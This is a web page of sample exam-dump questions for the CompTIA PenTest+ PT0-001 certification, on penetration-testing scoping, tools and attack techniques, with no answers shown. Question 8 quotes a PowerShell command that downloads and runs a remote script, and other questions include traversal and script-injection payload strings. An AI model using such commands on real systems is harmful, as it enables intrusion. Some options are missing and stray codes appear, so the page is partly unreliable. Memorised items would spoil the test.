CompTIA PT0-001 Exam Dumps

CompTIA PT0-001 Exam Dumps

CompTIA PenTest+ Exam

294 Questions & Answers with Explanation
Update Date : October 01, 2024
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CompTIA PT0-001 Sample Questions

Question # 1

When negotiating a penetration testing contract with a prospective client, which of thefollowing disclaimersshould be included in order to mitigate liability in case of a future breach of the client’ssystems?

A. The proposed mitigations and remediations in the final report do not include a costbenefit analysis. 
B. The NDA protects the consulting firm from future liabilities in the event of a breach. 
C. The assessment reviewed the cyber key terrain and most critical assets of the client’snetwork. 
D. The penetration test is based on the state of the system and its configuration at the timeof assessment. 

Question # 2

Which of the following tools would a penetration tester leverage to conduct OSINT? (SelectTWO).

A. Shodan 
C. BeEF 
D. Wireshark 
E. Maltego 
F. Dynamo 

Question # 3

Which of the following tools is used to perform a credential brute force attack?

A. Hydra 
B. John the Ripper 
C. Hashcat 
D. Peach 

Question # 4

A penetration tester used an ASP.NET web shell to gain access to a web application,which allowed the testerto pivot in the corporate network. Which of the following is the MOST important follow-upactivity to completeafter the tester delivers the report?

A. Removing shells 
B. Obtaining client acceptance 
C. Removing tester-created credentials 
D. Documenting lessons learned 
E. Presenting attestation of findings 

Question # 5

A client needs to be PCI compliant and has external-facing web servers. Which of the following CVSSvulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

A. 2.9 
B. 3.0 
C. 4.0 
D. 5.9 

Question # 6

During a physical security review, a detailed penetration testing report was obtained, whichwas issued to asecurity analyst and then discarded in the trash. The report contains validated critical riskexposures. Which ofthe following processes would BEST protect this information from being disclosed in thefuture?

A. Restrict access to physical copies to authorized personnel only. 
B. Ensure corporate policies include guidance on the proper handling of sensitiveinformation. 
C. Require only electronic copies of all documents to be maintained. 
D. Install surveillance cameras near all garbage disposal areas. 

Question # 7

A penetration tester needs to provide the code used to exploit a DNS server in the finalreport. In which of thefollowing parts of the report should the penetration tester place the code?

A. Executive summary 
B. Remediation 
C. Conclusion 
D. Technical summary 

Question # 8

Consider the following PowerShell command:powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1”);Invoke-CmdletWhich of the following BEST describes the actions performed this command?

A. Set the execution policy 
B. Execute a remote script 
C. Run an encoded command 
D. Instantiate an object 

Question # 9

Given the following Python script:#1/usr/bin/pythonimport socket as sktfor port in range (1,1024):try:sox=skt.socket(skt.AF.INET,skt.SOCK_STREAM)sox.settimeout(1000)sox.connect ((‘’, port))print ‘%d:OPEN’ % (port)sox.closeexcept: continueWhich of the following is where the output will go?

A. To the screen 
B. To a network server 
C. To a file 
D. To /dev/null 

Question # 10

A penetration tester has gained physical access to a facility and connected directly into theinternal network.The penetration tester now wants to pivot into the server VLAN. Which of the followingwould accomplish this?

A. Spoofing a printer’s MAC address 
B. Abusing DTP negotiation 
C. Performing LLMNR poisoning 
D. Conducting an STP attack 

Question # 11

A vulnerability scan report shows what appears to be evidence of a memory disclosurevulnerability on one ofthe target hosts. The administrator claims the system is patched and the evidence is a falsepositive. Which ofthe following is the BEST method for a tester to confirm the vulnerability exists?

A. Manually run publicly available exploit code. 
B. Confirm via evidence of the updated version number. 
C. Run the vulnerability scanner again. 
D. Perform dynamic analysis on the vulnerable service. 

Question # 12

A penetration tester has identified a directory traversal vulnerability. Which of the followingpayloads could havehelped the penetration tester identify this vulnerability?

A. ‘or ‘folder’ like ‘file’; –– 
B. || is /tmp/ 
C. “><script>document.location=/root/</script> 
D. && dir C:/ 
E. ../../../../../../../../ 

Question # 13

The scope of a penetration test requires the tester to be stealthy when performing portscans. Which of the following commands with Nmap BEST supports stealthy scanning?

A. ––min-rate 
B. ––max-length 
C. ––host-timeout 
D. ––max-rate D18912E1457D5D1DDCBD40AB3BF70D5D 

Question # 14

A penetration tester is planning to conduct a distributed dictionary attack on a governmentdomain against thelogin portal. The tester will leverage multiple proxies to mask the origin IPs of the attack.Which of the followingthreat actors will be emulated?

B. Hacktivist 
C. Script kiddie 
D. Insider threat 

Question # 15

A security analyst has uncovered a suspicious request in the logs for a web application.Given the following URL:http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswdWhich of the following attack types is MOST likely to be the vulnerability?

A. Directory traversal 
B. Cross-site scripting 
C. Remote file inclusion 
D. User enumeration 

Question # 16

Which of the following BEST protects against a rainbow table attack?D18912E1457D5D1DDCBD40AB3BF70D5D

A. Increased password complexity 
B. Symmetric encryption 
C. Cryptographic salting 
D. Hardened OS configurations 

Question # 17

At the information gathering stage, a penetration tester is trying to passively identify thetechnology running ona client’s website. Which of the following approached should the penetration tester take?

A. Run a spider scan in Burp Suite. 
B. Use web aggregators such as BuiltWith and Netcraft 
C. Run a web scraper and pull the website’s content. 
D. Use Nmap to fingerprint the website’s technology. 

Question # 18

A penetration tester is testing a banking application and uncovers a vulnerability. The testeris logged in as a non-privileged user who should have no access to any data. Given thedata below from the web interception proxyRequestPOST /Bank/Tax/RTSdocuments/ HTTP 1.1Host: test.comAccept: text/html; application/xhtml+xmlReferrer: https://www.test.com/Bank/Tax/RTSdocuments/Cookie: PHPSESSIONID: ;Content-Type: application/form-data;Response403 Forbidden<tr><td> Error:</td></tr><tr><td> Insufficient Privileges to view the data. </td></tr>Displaying 1-10 of 105 recordsWhich of the following types of vulnerabilities is being exploited?

A. Forced browsing vulnerability 
B. Parameter pollution vulnerability 
C. File upload vulnerability 
D. Cookie enumeration 

Question # 19

A penetration tester discovers an anonymous FTP server that is sharing the C:\drive.Which of the following isthe BEST exploit?

A. Place a batch script in the startup folder for all users. 
B. Change a service binary location path to point to the tester’s own payload. 
C. Escalate the tester’s privileges to SYSTEM using the at.exe command. 
D. Download, modify, and reupload a compromised registry to obtain code execution. 

Question # 20

A penetration tester is performing a black-box test of a client web application, and the scanhost is unable toaccess it. The client has sent screenshots showing the system is functioning correctly.Which of the following isMOST likely the issue?

A. The penetration tester was not provided with a WSDL file. 
B. The penetration tester needs an OAuth bearer token. 
C. The tester has provided an incorrect password for the application. 
D. An IPS/WAF whitelist is in place to protect the environment. 

Question # 21

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Give the below code and output Import requests from BeautifulSoup import BeautifulSoup request = requests.get (“https://www.bank.com/admin”) respHeaders, respBody = request[0]. Request[1] if respHeader.statuscode == 200: soup = BeautifulSoup (respBody) soup = soup.FindAll (“div”, (“type” : “hidden”)) print respHeader. StatusCode, StatusMessage else: print respHeader. StatusCode, StatusMessage Output: 200 OK Which of the following is the tester intending to do?

A. Horizontally escalate privileges 
B. Scrape the page for hidden fields 
C. Analyze HTTP respond code 
D. Search for HTTP headers 

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